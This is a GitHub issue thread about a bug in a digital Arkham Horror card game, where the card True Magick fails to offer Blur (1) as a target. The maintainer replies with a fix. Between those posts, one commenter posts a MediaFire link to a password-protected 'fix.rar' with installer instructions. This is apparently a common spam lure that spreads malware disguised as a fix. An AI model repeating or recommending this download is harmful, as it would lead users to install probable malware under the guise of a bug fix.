### ISSUE TITLE
True Magick doesn't consider Blur (1) a valid target in hand

### ISSUE THREAD

**Issue by mniksa3** [halogenandtoast/ArkhamHorror#449]
**Game ID**: 20731b01-924d-4b03-8ea3-60e05ba9a095

**Describe the bug**: Fairly sure this works rules-wise. When activating True Magick to select a Spell asset in hand, Blur (1) is not highlighted as a valid Spell asset to choose even though a charge exists (on True Magick). Sixth Sense (4) works as expected, highlighted and useable via True Magick.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by halogenandtoast** [comment]
You are correct here. True Magick is such a tough card to implement, it took me a while to reorient myself around how I made the card work, BUT I wasn't copying enough details about True Magick and it wasn't acting like it had the charge on it. I fixed that, but then for some reason other aspects of True Magick were broken and the effects of blur weren't being applied. I made some substantial changes here and I think it works correctly now, but just a warning to be on the lookout for it not working correctly. Trying to deploy the fix now so once I close this issue it should be live.
